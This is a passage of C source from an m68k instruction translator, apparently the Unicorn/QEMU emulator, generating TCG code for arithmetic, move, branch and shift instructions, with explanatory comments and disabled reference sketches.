*/ s->cc_op = CC_OP_CMPW; s->cc_op_synced = 1; } DISAS_INSN(cas2l) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint16_t ext1, ext2; TCGv addr1, addr2, regs; /* cas2 Dc1:Dc2,Du1:Du2,(Rn1):(Rn2) */ ext1 = read_im16(env, s); if (ext1 & 0x8000) { /* Address Register */ addr1 = AREG(ext1, 12); } else { /* Data Register */ addr1 = DREG(ext1, 12); } ext2 = read_im16(env, s); if (ext2 & 0x8000) { /* Address Register */ addr2 = AREG(ext2, 12); } else { /* Data Register */ addr2 = DREG(ext2, 12); } /* * if (R1) == Dc1 && (R2) == Dc2 then * (R1) = Du1 * (R2) = Du2 * else * Dc1 = (R1) * Dc2 = (R2) */ regs = tcg_const_i32(tcg_ctx, REG(ext2, 6) | (REG(ext1, 6) << 3) | (REG(ext2, 0) << 6) | (REG(ext1, 0) << 9)); if (tb_cflags(s->base.tb) & CF_PARALLEL) { gen_helper_cas2l_parallel(tcg_ctx, tcg_ctx->cpu_env, regs, addr1, addr2); } else { gen_helper_cas2l(tcg_ctx, tcg_ctx->cpu_env, regs, addr1, addr2); } tcg_temp_free(tcg_ctx, regs); /* Note that cas2l also assigned to env->cc_op. */ s->cc_op = CC_OP_CMPL; s->cc_op_synced = 1; } DISAS_INSN(byterev) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; reg = DREG(insn, 0); tcg_gen_bswap32_i32(tcg_ctx, reg, reg); } DISAS_INSN(move) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src; TCGv dest; int op; int opsize; switch (insn >> 12) { case 1: /* move.b */ opsize = OS_BYTE; break; case 2: /* move.l */ opsize = OS_LONG; break; case 3: /* move.w */ opsize = OS_WORD; break; default: abort(); } SRC_EA(env, src, opsize, 1, NULL); op = (insn >> 6) & 7; if (op == 1) { /* movea */ /* The value will already have been sign extended. */ dest = AREG(insn, 9); tcg_gen_mov_i32(tcg_ctx, dest, src); } else { /* normal move */ uint16_t dest_ea; dest_ea = ((insn >> 9) & 7) | (op << 3); DEST_EA(env, dest_ea, opsize, src, NULL); /* This will be correct because loads sign extend. */ gen_logic_cc(s, src, opsize); } } DISAS_INSN(negx) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv z; TCGv src; TCGv addr; int opsize; opsize = insn_opsize(insn); SRC_EA(env, src, opsize, 1, &addr); gen_flush_flags(s); /* compute old Z */ /* * Perform subtraction with borrow. * (X, N) = -(src + X); */ z = tcg_const_i32(tcg_ctx, 0); tcg_gen_add2_i32(tcg_ctx, QREG_CC_N, QREG_CC_X, src, z, QREG_CC_X, z); tcg_gen_sub2_i32(tcg_ctx, QREG_CC_N, QREG_CC_X, z, z, QREG_CC_N, QREG_CC_X); tcg_temp_free(tcg_ctx, z); gen_ext(tcg_ctx, QREG_CC_N, QREG_CC_N, opsize, 1); tcg_gen_andi_i32(tcg_ctx, QREG_CC_X, QREG_CC_X, 1); /* * Compute signed-overflow for negation. The normal formula for * subtraction is (res ^ src) & (src ^ dest), but with dest==0 * this simplifies to res & src. */ tcg_gen_and_i32(tcg_ctx, QREG_CC_V, QREG_CC_N, src); /* Copy the rest of the results into place. 
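The OR into QREG_CC_Z keeps !Z sticky: a nonzero result clears Z while a zero result preserves the previous Z, as multi-precision negation sequences expect. 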
*/ tcg_gen_or_i32(tcg_ctx, QREG_CC_Z, QREG_CC_Z, QREG_CC_N); /* !Z is sticky */ tcg_gen_mov_i32(tcg_ctx, QREG_CC_C, QREG_CC_X); set_cc_op(s, CC_OP_FLAGS); /* result is in QREG_CC_N */ DEST_EA(env, insn, opsize, QREG_CC_N, &addr); } DISAS_INSN(lea) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; TCGv tmp; reg = AREG(insn, 9); tmp = gen_lea(env, s, insn, OS_LONG); if (IS_NULL_QREG(tmp)) { gen_addr_fault(s); return; } tcg_gen_mov_i32(tcg_ctx, reg, tmp); } DISAS_INSN(clr) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int opsize; TCGv zero; zero = tcg_const_i32(tcg_ctx, 0); opsize = insn_opsize(insn); DEST_EA(env, insn, opsize, zero, NULL); gen_logic_cc(s, zero, opsize); tcg_temp_free(tcg_ctx, zero); } DISAS_INSN(move_from_ccr) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv ccr; ccr = gen_get_ccr(s); DEST_EA(env, insn, OS_WORD, ccr, NULL); } DISAS_INSN(neg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src1; TCGv dest; TCGv addr; int opsize; opsize = insn_opsize(insn); SRC_EA(env, src1, opsize, 1, &addr); dest = tcg_temp_new(tcg_ctx); tcg_gen_neg_i32(tcg_ctx, dest, src1); set_cc_op(s, CC_OP_SUBB + opsize); gen_update_cc_add(tcg_ctx, dest, src1, opsize); tcg_gen_setcondi_i32(tcg_ctx, TCG_COND_NE, QREG_CC_X, dest, 0); DEST_EA(env, insn, opsize, dest, &addr); tcg_temp_free(tcg_ctx, dest); } DISAS_INSN(move_to_ccr) { gen_move_to_sr(env, s, insn, true); } DISAS_INSN(not) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src1; TCGv dest; TCGv addr; int opsize; opsize = insn_opsize(insn); SRC_EA(env, src1, opsize, 1, &addr); dest = tcg_temp_new(tcg_ctx); tcg_gen_not_i32(tcg_ctx, dest, src1); DEST_EA(env, insn, opsize, dest, &addr); gen_logic_cc(s, dest, opsize); } DISAS_INSN(swap) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src1; TCGv src2; TCGv reg; src1 = tcg_temp_new(tcg_ctx); src2 = tcg_temp_new(tcg_ctx); reg = DREG(insn, 0); tcg_gen_shli_i32(tcg_ctx, src1, reg, 16); tcg_gen_shri_i32(tcg_ctx, src2, reg, 16); tcg_gen_or_i32(tcg_ctx, reg, src1, src2); tcg_temp_free(tcg_ctx, src2); tcg_temp_free(tcg_ctx, src1); gen_logic_cc(s, reg, OS_LONG); } DISAS_INSN(bkpt) { gen_exception(s, s->base.pc_next, EXCP_DEBUG); } DISAS_INSN(pea) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv tmp; tmp = gen_lea(env, s, insn, OS_LONG); if (IS_NULL_QREG(tmp)) { gen_addr_fault(s); return; } gen_push(s, tmp); } DISAS_INSN(ext) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int op; TCGv reg; TCGv tmp; reg = DREG(insn, 0); op = (insn >> 6) & 7; tmp = tcg_temp_new(tcg_ctx); if (op == 3) tcg_gen_ext16s_i32(tcg_ctx, tmp, reg); else tcg_gen_ext8s_i32(tcg_ctx, tmp, reg); if (op == 2) gen_partset_reg(tcg_ctx, OS_WORD, reg, tmp); else tcg_gen_mov_i32(tcg_ctx, reg, tmp); gen_logic_cc(s, tmp, OS_LONG); tcg_temp_free(tcg_ctx, tmp); } DISAS_INSN(tst) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int opsize; TCGv tmp; opsize = insn_opsize(insn); SRC_EA(env, tmp, opsize, 1, NULL); gen_logic_cc(s, tmp, opsize); } DISAS_INSN(pulse) { /* Implemented as a NOP. */ } DISAS_INSN(illegal) { gen_exception(s, s->base.pc_next, EXCP_ILLEGAL); } /* ??? This should be atomic. 
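A real 68000 holds the bus for the whole read-modify-write cycle of TAS; here the load and the OR-0x80 store are separate operations, which is only safe while the guest runs single-threaded. 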
*/ DISAS_INSN(tas) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv dest; TCGv src1; TCGv addr; dest = tcg_temp_new(tcg_ctx); SRC_EA(env, src1, OS_BYTE, 1, &addr); gen_logic_cc(s, src1, OS_BYTE); tcg_gen_ori_i32(tcg_ctx, dest, src1, 0x80); DEST_EA(env, insn, OS_BYTE, dest, &addr); tcg_temp_free(tcg_ctx, dest); } DISAS_INSN(mull) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint16_t ext; TCGv src1; int sign; ext = read_im16(env, s); sign = ext & 0x800; if (ext & 0x400) { if (!m68k_feature(s->env, M68K_FEATURE_QUAD_MULDIV)) { gen_exception(s, s->base.pc_next, EXCP_ILLEGAL); return; } SRC_EA(env, src1, OS_LONG, 0, NULL); if (sign) { tcg_gen_muls2_i32(tcg_ctx, QREG_CC_Z, QREG_CC_N, src1, DREG(ext, 12)); } else { tcg_gen_mulu2_i32(tcg_ctx, QREG_CC_Z, QREG_CC_N, src1, DREG(ext, 12)); } /* if Dl == Dh, 68040 returns low word */ tcg_gen_mov_i32(tcg_ctx, DREG(ext, 0), QREG_CC_N); tcg_gen_mov_i32(tcg_ctx, DREG(ext, 12), QREG_CC_Z); tcg_gen_or_i32(tcg_ctx, QREG_CC_Z, QREG_CC_Z, QREG_CC_N); tcg_gen_movi_i32(tcg_ctx, QREG_CC_V, 0); tcg_gen_movi_i32(tcg_ctx, QREG_CC_C, 0); set_cc_op(s, CC_OP_FLAGS); return; } SRC_EA(env, src1, OS_LONG, 0, NULL); if (m68k_feature(s->env, M68K_FEATURE_M68000)) { tcg_gen_movi_i32(tcg_ctx, QREG_CC_C, 0); if (sign) { tcg_gen_muls2_i32(tcg_ctx, QREG_CC_N, QREG_CC_V, src1, DREG(ext, 12)); /* QREG_CC_V is -(QREG_CC_V != (QREG_CC_N >> 31)) */ tcg_gen_sari_i32(tcg_ctx, QREG_CC_Z, QREG_CC_N, 31); tcg_gen_setcond_i32(tcg_ctx, TCG_COND_NE, QREG_CC_V, QREG_CC_V, QREG_CC_Z); } else { tcg_gen_mulu2_i32(tcg_ctx, QREG_CC_N, QREG_CC_V, src1, DREG(ext, 12)); /* QREG_CC_V is -(QREG_CC_V != 0), use QREG_CC_C as 0 */ tcg_gen_setcond_i32(tcg_ctx, TCG_COND_NE, QREG_CC_V, QREG_CC_V, QREG_CC_C); } tcg_gen_neg_i32(tcg_ctx, QREG_CC_V, QREG_CC_V); tcg_gen_mov_i32(tcg_ctx, DREG(ext, 12), QREG_CC_N); tcg_gen_mov_i32(tcg_ctx, QREG_CC_Z, QREG_CC_N); set_cc_op(s, CC_OP_FLAGS); } else { /* * The upper 32 bits of the product are discarded, so * muls.l and mulu.l are functionally equivalent. 
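*/

/*
 * Illustrative sketch, not part of the build: the equivalence claimed
 * above, checked on host integers.  The low 32 bits of a 32x32 product
 * do not depend on the signedness of the operands, so a 32-bit-result
 * muls.l/mulu.l can share one multiply.  Names are placeholders.
 */
#if 0
static int mul_low32_agrees(uint32_t a, uint32_t b)
{
    uint32_t lo_u = (uint32_t)((uint64_t)a * b);
    uint32_t lo_s = (uint32_t)((int64_t)(int32_t)a * (int32_t)b);
    return lo_u == lo_s;      /* always true */
}
#endif

/* The upper 32 bits of the product are discarded, so
 * muls.l and mulu.l are functionally equivalent.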
*/ tcg_gen_mul_i32(tcg_ctx, DREG(ext, 12), src1, DREG(ext, 12)); gen_logic_cc(s, DREG(ext, 12), OS_LONG); } } static void gen_link(DisasContext *s, uint16_t insn, int32_t offset) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; TCGv tmp; reg = AREG(insn, 0); tmp = tcg_temp_new(tcg_ctx); tcg_gen_subi_i32(tcg_ctx, tmp, QREG_SP, 4); gen_store(s, OS_LONG, tmp, reg, IS_USER(s)); if ((insn & 7) != 7) { tcg_gen_mov_i32(tcg_ctx, reg, tmp); } tcg_gen_addi_i32(tcg_ctx, QREG_SP, tmp, offset); tcg_temp_free(tcg_ctx, tmp); } DISAS_INSN(link) { int16_t offset; offset = read_im16(env, s); gen_link(s, insn, offset); } DISAS_INSN(linkl) { int32_t offset; offset = read_im32(env, s); gen_link(s, insn, offset); } DISAS_INSN(unlk) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src; TCGv reg; TCGv tmp; src = tcg_temp_new(tcg_ctx); reg = AREG(insn, 0); tcg_gen_mov_i32(tcg_ctx, src, reg); tmp = gen_load(s, OS_LONG, src, 0, IS_USER(s)); tcg_gen_mov_i32(tcg_ctx, reg, tmp); tcg_gen_addi_i32(tcg_ctx, QREG_SP, src, 4); tcg_temp_free(tcg_ctx, src); tcg_temp_free(tcg_ctx, tmp); } DISAS_INSN(reset) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (IS_USER(s)) { gen_exception(s, s->base.pc_next, EXCP_PRIVILEGE); return; } gen_helper_reset(tcg_ctx, tcg_ctx->cpu_env); } DISAS_INSN(nop) { } DISAS_INSN(rtd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv tmp; int16_t offset = read_im16(env, s); tmp = gen_load(s, OS_LONG, QREG_SP, 0, IS_USER(s)); tcg_gen_addi_i32(tcg_ctx, QREG_SP, QREG_SP, offset + 4); gen_jmp(s, tmp); } DISAS_INSN(rts) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv tmp; tmp = gen_load(s, OS_LONG, QREG_SP, 0, IS_USER(s)); tcg_gen_addi_i32(tcg_ctx, QREG_SP, QREG_SP, 4); gen_jmp(s, tmp); } DISAS_INSN(jump) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv tmp; /* * Load the target address first to ensure correct exception * behavior. */ tmp = gen_lea(env, s, insn, OS_LONG); if (IS_NULL_QREG(tmp)) { gen_addr_fault(s); return; } if ((insn & 0x40) == 0) { /* jsr */ gen_push(s, tcg_const_i32(tcg_ctx, s->pc)); } gen_jmp(s, tmp); } DISAS_INSN(addsubq) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src; TCGv dest; TCGv val; int imm; TCGv addr; int opsize; if ((insn & 070) == 010) { /* Operation on address register is always long. */ opsize = OS_LONG; } else { opsize = insn_opsize(insn); } SRC_EA(env, src, opsize, 1, &addr); imm = (insn >> 9) & 7; if (imm == 0) { imm = 8; } val = tcg_const_i32(tcg_ctx, imm); dest = tcg_temp_new(tcg_ctx); tcg_gen_mov_i32(tcg_ctx, dest, src); if ((insn & 0x38) == 0x08) { /* * Don't update condition codes if the destination is an * address register. */ if (insn & 0x0100) { tcg_gen_sub_i32(tcg_ctx, dest, dest, val); } else { tcg_gen_add_i32(tcg_ctx, dest, dest, val); } } else { if (insn & 0x0100) { tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LTU, QREG_CC_X, dest, val); tcg_gen_sub_i32(tcg_ctx, dest, dest, val); set_cc_op(s, CC_OP_SUBB + opsize); } else { tcg_gen_add_i32(tcg_ctx, dest, dest, val); tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LTU, QREG_CC_X, dest, val); set_cc_op(s, CC_OP_ADDB + opsize); } gen_update_cc_add(tcg_ctx, dest, val, opsize); } tcg_temp_free(tcg_ctx, val); DEST_EA(env, insn, opsize, dest, &addr); tcg_temp_free(tcg_ctx, dest); } DISAS_INSN(tpf) { switch (insn & 7) { case 2: /* One extension word. */ s->pc += 2; break; case 3: /* Two extension words. */ s->pc += 4; break; case 4: /* No extension words. 
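*/

/*
 * Illustrative sketch, not part of the build: the Bcc/BSR displacement
 * rule used by the branch handler that follows, on host integers.  An
 * inline 8-bit displacement of 0 means a 16-bit displacement word
 * follows; -1 (0xff) means a 32-bit displacement longword follows
 * (68020+).  Names are placeholders.
 */
#if 0
static int bcc_disp_width(uint16_t insn)
{
    int32_t off = (int8_t)insn;
    if (off == 0) {
        return 16;            /* displacement comes from read_im16() */
    } else if (off == -1) {
        return 32;            /* displacement comes from read_im32() */
    }
    return 8;                 /* displacement is the low opcode byte */
}
#endif

/* No extension words.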
*/ break; default: disas_undef(env, s, insn); } } DISAS_INSN(branch) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int32_t offset; uint32_t base; int op; base = s->pc; op = (insn >> 8) & 0xf; offset = (int8_t)insn; if (offset == 0) { offset = (int16_t)read_im16(env, s); } else if (offset == -1) { offset = read_im32(env, s); } if (op == 1) { /* bsr */ gen_push(s, tcg_const_i32(tcg_ctx, s->pc)); } if (op > 1) { /* Bcc */ TCGLabel *l1 = gen_new_label(tcg_ctx); gen_jmpcc(s, ((insn >> 8) & 0xf) ^ 1, l1); gen_jmp_tb(s, 1, base + offset); gen_set_label(tcg_ctx, l1); gen_jmp_tb(s, 0, s->pc); } else { /* Unconditional branch. */ update_cc_op(s); gen_jmp_tb(s, 0, base + offset); } } DISAS_INSN(moveq) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_movi_i32(tcg_ctx, DREG(insn, 9), (int8_t)insn); gen_logic_cc(s, DREG(insn, 9), OS_LONG); } DISAS_INSN(mvzs) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int opsize; TCGv src; TCGv reg; if (insn & 0x40) opsize = OS_WORD; else opsize = OS_BYTE; SRC_EA(env, src, opsize, (insn & 0x80) == 0, NULL); reg = DREG(insn, 9); tcg_gen_mov_i32(tcg_ctx, reg, src); gen_logic_cc(s, src, opsize); } DISAS_INSN(or) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv reg; TCGv dest; TCGv src; TCGv addr; int opsize; opsize = insn_opsize(insn); reg = gen_extend(s, DREG(insn, 9), opsize, 0); dest = tcg_temp_new(tcg_ctx); if (insn & 0x100) { SRC_EA(env, src, opsize, 0, &addr); tcg_gen_or_i32(tcg_ctx, dest, src, reg); DEST_EA(env, insn, opsize, dest, &addr); } else { SRC_EA(env, src, opsize, 0, NULL); tcg_gen_or_i32(tcg_ctx, dest, src, reg); gen_partset_reg(tcg_ctx, opsize, DREG(insn, 9), dest); } gen_logic_cc(s, dest, opsize); tcg_temp_free(tcg_ctx, dest); } DISAS_INSN(suba) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src; TCGv reg; SRC_EA(env, src, (insn & 0x100) ? OS_LONG : OS_WORD, 1, NULL); reg = AREG(insn, 9); tcg_gen_sub_i32(tcg_ctx, reg, reg, src); } static inline void gen_subx(DisasContext *s, TCGv src, TCGv dest, int opsize) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv tmp; gen_flush_flags(s); /* compute old Z */ /* * Perform subtract with borrow. * (X, N) = dest - (src + X); */ tmp = tcg_const_i32(tcg_ctx, 0); tcg_gen_add2_i32(tcg_ctx, QREG_CC_N, QREG_CC_X, src, tmp, QREG_CC_X, tmp); tcg_gen_sub2_i32(tcg_ctx, QREG_CC_N, QREG_CC_X, dest, tmp, QREG_CC_N, QREG_CC_X); gen_ext(tcg_ctx, QREG_CC_N, QREG_CC_N, opsize, 1); tcg_gen_andi_i32(tcg_ctx, QREG_CC_X, QREG_CC_X, 1); /* Compute signed-overflow for subtraction. */ tcg_gen_xor_i32(tcg_ctx, QREG_CC_V, QREG_CC_N, dest); tcg_gen_xor_i32(tcg_ctx, tmp, dest, src); tcg_gen_and_i32(tcg_ctx, QREG_CC_V, QREG_CC_V, tmp); tcg_temp_free(tcg_ctx, tmp); /* Copy the rest of the results into place. 
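*/

/*
 * Illustrative sketch, not part of the build: a host-integer reference
 * model of the SUBX flag computation in gen_subx() above, byte-sized.
 * Names are placeholders.
 */
#if 0
static void subx_b_model(uint8_t dest, uint8_t src, int x_in, int z_in,
                         uint8_t *res, int *x, int *n, int *z, int *v)
{
    unsigned sum = (unsigned)src + (unsigned)x_in;
    *res = (uint8_t)(dest - sum);
    *x = (unsigned)dest < sum;            /* borrow out, copied to C */
    *n = (*res & 0x80) != 0;
    *z = z_in && (*res == 0);             /* Z is sticky across SUBX */
    *v = ((*res ^ dest) & (dest ^ src) & 0x80) != 0;
}
#endif

/* Copy the rest of the results into place.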
*/ tcg_gen_or_i32(tcg_ctx, QREG_CC_Z, QREG_CC_Z, QREG_CC_N); /* !Z is sticky */ tcg_gen_mov_i32(tcg_ctx, QREG_CC_C, QREG_CC_X); set_cc_op(s, CC_OP_FLAGS); /* result is in QREG_CC_N */ } DISAS_INSN(subx_reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv dest; TCGv src; int opsize; opsize = insn_opsize(insn); src = gen_extend(s, DREG(insn, 0), opsize, 1); dest = gen_extend(s, DREG(insn, 9), opsize, 1); gen_subx(s, src, dest, opsize); gen_partset_reg(tcg_ctx, opsize, DREG(insn, 9), QREG_CC_N); } DISAS_INSN(subx_mem) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src; TCGv addr_src; TCGv dest; TCGv addr_dest; int opsize; opsize = insn_opsize(insn); addr_src = AREG(insn, 0); tcg_gen_subi_i32(tcg_ctx, addr_src, addr_src, opsize_bytes(opsize)); src = gen_load(s, opsize, addr_src, 1, IS_USER(s)); addr_dest = AREG(insn, 9); tcg_gen_subi_i32(tcg_ctx, addr_dest, addr_dest, opsize_bytes(opsize)); dest = gen_load(s, opsize, addr_dest, 1, IS_USER(s)); gen_subx(s, src, dest, opsize); gen_store(s, opsize, addr_dest, QREG_CC_N, IS_USER(s)); tcg_temp_free(tcg_ctx, dest); tcg_temp_free(tcg_ctx, src); } DISAS_INSN(mov3q) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src; int val; val = (insn >> 9) & 7; if (val == 0) val = -1; src = tcg_const_i32(tcg_ctx, val); gen_logic_cc(s, src, OS_LONG); DEST_EA(env, insn, OS_LONG, src, NULL); tcg_temp_free(tcg_ctx, src); } DISAS_INSN(cmp) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src; TCGv reg; int opsize; opsize = insn_opsize(insn); SRC_EA(env, src, opsize, 1, NULL); reg = gen_extend(s, DREG(insn, 9), opsize, 1); gen_update_cc_cmp(s, reg, src, opsize); } DISAS_INSN(cmpa) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int opsize; TCGv src; TCGv reg; if (insn & 0x100) { opsize = OS_LONG; } else { opsize = OS_WORD; } SRC_EA(env, src, opsize, 1, NULL); reg = AREG(insn, 9); gen_update_cc_cmp(s, reg, src, OS_LONG); } DISAS_INSN(cmpm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int opsize = insn_opsize(insn); TCGv src, dst; /* Post-increment load (mode 3) from Ay. */ src = gen_ea_mode(env, s, 3, REG(insn, 0), opsize, tcg_ctx->NULL_QREG, NULL, EA_LOADS, IS_USER(s)); /* Post-increment load (mode 3) from Ax. 
*/ dst = gen_ea_mode(env, s, 3, REG(insn, 9), opsize, tcg_ctx->NULL_QREG, NULL, EA_LOADS, IS_USER(s)); gen_update_cc_cmp(s, dst, src, opsize); } DISAS_INSN(eor) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src; TCGv dest; TCGv addr; int opsize; opsize = insn_opsize(insn); SRC_EA(env, src, opsize, 0, &addr); dest = tcg_temp_new(tcg_ctx); tcg_gen_xor_i32(tcg_ctx, dest, src, DREG(insn, 9)); gen_logic_cc(s, dest, opsize); DEST_EA(env, insn, opsize, dest, &addr); tcg_temp_free(tcg_ctx, dest); } static void do_exg(TCGContext *tcg_ctx, TCGv reg1, TCGv reg2) { TCGv temp = tcg_temp_new(tcg_ctx); tcg_gen_mov_i32(tcg_ctx, temp, reg1); tcg_gen_mov_i32(tcg_ctx, reg1, reg2); tcg_gen_mov_i32(tcg_ctx, reg2, temp); tcg_temp_free(tcg_ctx, temp); } DISAS_INSN(exg_dd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* exchange Dx and Dy */ do_exg(tcg_ctx, DREG(insn, 9), DREG(insn, 0)); } DISAS_INSN(exg_aa) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* exchange Ax and Ay */ do_exg(tcg_ctx, AREG(insn, 9), AREG(insn, 0)); } DISAS_INSN(exg_da) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* exchange Dx and Ay */ do_exg(tcg_ctx, DREG(insn, 9), AREG(insn, 0)); } DISAS_INSN(and) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src; TCGv reg; TCGv dest; TCGv addr; int opsize; dest = tcg_temp_new(tcg_ctx); opsize = insn_opsize(insn); reg = DREG(insn, 9); if (insn & 0x100) { SRC_EA(env, src, opsize, 0, &addr); tcg_gen_and_i32(tcg_ctx, dest, src, reg); DEST_EA(env, insn, opsize, dest, &addr); } else { SRC_EA(env, src, opsize, 0, NULL); tcg_gen_and_i32(tcg_ctx, dest, src, reg); gen_partset_reg(tcg_ctx, opsize, reg, dest); } gen_logic_cc(s, dest, opsize); tcg_temp_free(tcg_ctx, dest); } DISAS_INSN(adda) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src; TCGv reg; SRC_EA(env, src, (insn & 0x100) ? OS_LONG : OS_WORD, 1, NULL); reg = AREG(insn, 9); tcg_gen_add_i32(tcg_ctx, reg, reg, src); } static inline void gen_addx(DisasContext *s, TCGv src, TCGv dest, int opsize) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv tmp; gen_flush_flags(s); /* compute old Z */ /* * Perform addition with carry. * (X, N) = src + dest + X; */ tmp = tcg_const_i32(tcg_ctx, 0); tcg_gen_add2_i32(tcg_ctx, QREG_CC_N, QREG_CC_X, QREG_CC_X, tmp, dest, tmp); tcg_gen_add2_i32(tcg_ctx, QREG_CC_N, QREG_CC_X, QREG_CC_N, QREG_CC_X, src, tmp); gen_ext(tcg_ctx, QREG_CC_N, QREG_CC_N, opsize, 1); /* Compute signed-overflow for addition. */ tcg_gen_xor_i32(tcg_ctx, QREG_CC_V, QREG_CC_N, src); tcg_gen_xor_i32(tcg_ctx, tmp, dest, src); tcg_gen_andc_i32(tcg_ctx, QREG_CC_V, QREG_CC_V, tmp); tcg_temp_free(tcg_ctx, tmp); /* Copy the rest of the results into place. 
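*/

/*
 * Illustrative sketch, not part of the build: a host-integer reference
 * model of the ADDX flag computation in gen_addx() above, byte-sized.
 * Names are placeholders.
 */
#if 0
static void addx_b_model(uint8_t dest, uint8_t src, int x_in, int z_in,
                         uint8_t *res, int *x, int *n, int *z, int *v)
{
    unsigned wide = (unsigned)dest + (unsigned)src + (unsigned)x_in;
    *res = (uint8_t)wide;
    *x = (wide >> 8) & 1;                 /* carry out, copied to C */
    *n = (*res & 0x80) != 0;
    *z = z_in && (*res == 0);             /* Z is sticky across ADDX */
    *v = ((*res ^ src) & ~(dest ^ src) & 0x80) != 0;
}
#endif

/* Copy the rest of the results into place.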
*/ tcg_gen_or_i32(tcg_ctx, QREG_CC_Z, QREG_CC_Z, QREG_CC_N); /* !Z is sticky */ tcg_gen_mov_i32(tcg_ctx, QREG_CC_C, QREG_CC_X); set_cc_op(s, CC_OP_FLAGS); /* result is in QREG_CC_N */ } DISAS_INSN(addx_reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv dest; TCGv src; int opsize; opsize = insn_opsize(insn); dest = gen_extend(s, DREG(insn, 9), opsize, 1); src = gen_extend(s, DREG(insn, 0), opsize, 1); gen_addx(s, src, dest, opsize); gen_partset_reg(tcg_ctx, opsize, DREG(insn, 9), QREG_CC_N); } DISAS_INSN(addx_mem) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv src; TCGv addr_src; TCGv dest; TCGv addr_dest; int opsize; opsize = insn_opsize(insn); addr_src = AREG(insn, 0); tcg_gen_subi_i32(tcg_ctx, addr_src, addr_src, opsize_bytes(opsize)); src = gen_load(s, opsize, addr_src, 1, IS_USER(s)); addr_dest = AREG(insn, 9); tcg_gen_subi_i32(tcg_ctx, addr_dest, addr_dest, opsize_bytes(opsize)); dest = gen_load(s, opsize, addr_dest, 1, IS_USER(s)); gen_addx(s, src, dest, opsize); gen_store(s, opsize, addr_dest, QREG_CC_N, IS_USER(s)); tcg_temp_free(tcg_ctx, dest); tcg_temp_free(tcg_ctx, src); } static inline void shift_im(DisasContext *s, uint16_t insn, int opsize) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int count = (insn >> 9) & 7; int logical = insn & 8; int left = insn & 0x100; int bits = opsize_bytes(opsize) * 8; TCGv reg = gen_extend(s, DREG(insn, 0), opsize, !logical); if (count == 0) { count = 8; } tcg_gen_movi_i32(tcg_ctx, QREG_CC_V, 0); if (left) { tcg_gen_shri_i32(tcg_ctx, QREG_CC_C, reg, bits - count); tcg_gen_shli_i32(tcg_ctx, QREG_CC_N, reg, count); /* * Note that ColdFire always clears V (done above), * while M68000 sets V if the most significant bit is changed at * any time during the shift operation. */ if (!logical && m68k_feature(s->env, M68K_FEATURE_M68000)) { /* if shift count >= bits, V is (reg != 0) */ if (count >= bits) { tcg_gen_setcond_i32(tcg_ctx, TCG_COND_NE, QREG_CC_V, reg, QREG_CC_V); } else { TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_sari_i32(tcg_ctx, QREG_CC_V, reg, bits - 1); tcg_gen_sari_i32(tcg_ctx, t0, reg, bits - count - 1); tcg_gen_setcond_i32(tcg_ctx, TCG_COND_NE, QREG_CC_V, QREG_CC_V, t0); tcg_temp_free(tcg_ctx, t0); } tcg_gen_neg_i32(tcg_ctx, QREG_CC_V, QREG_CC_V); } } else { tcg_gen_shri_i32(tcg_ctx, QREG_CC_C, reg, count - 1); if (logical) { tcg_gen_shri_i32(tcg_ctx, QREG_CC_N, reg, count); } else { tcg_gen_sari_i32(tcg_ctx, QREG_CC_N, reg, count); } } gen_ext(tcg_ctx, QREG_CC_N, QREG_CC_N, opsize, 1); tcg_gen_andi_i32(tcg_ctx, QREG_CC_C, QREG_CC_C, 1); tcg_gen_mov_i32(tcg_ctx, QREG_CC_Z, QREG_CC_N); tcg_gen_mov_i32(tcg_ctx, QREG_CC_X, QREG_CC_C); gen_partset_reg(tcg_ctx, opsize, DREG(insn, 0), QREG_CC_N); set_cc_op(s, CC_OP_FLAGS); } static inline void shift_reg(DisasContext *s, uint16_t insn, int opsize) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int logical = insn & 8; int left = insn & 0x100; int bits = opsize_bytes(opsize) * 8; TCGv reg = gen_extend(s, DREG(insn, 0), opsize, 